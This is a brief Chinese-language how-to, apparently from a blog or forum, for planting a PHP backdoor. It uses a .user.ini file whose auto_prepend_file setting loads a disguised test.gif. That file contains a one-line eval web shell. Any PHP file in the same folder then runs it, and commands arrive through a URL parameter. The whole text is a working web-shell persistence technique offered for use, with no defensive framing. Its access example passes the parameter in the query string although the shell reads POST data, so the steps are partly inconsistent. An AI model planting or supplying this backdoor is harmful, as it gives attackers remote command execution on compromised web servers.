.user.ini文件构成的PHP后门

在同一目录下存在三个文件:

第一个:   .user.ini
内容为:auto_prepend_file=test.gif

第二个: test.gif
内容为:<?php  @eval ($_POST[123]); ?>

第三个:任意一个php文件,可以是原系统自带的。

然后访问:http://xxx.xxx.xxx/任意同目录下的php文件名.php?123=命令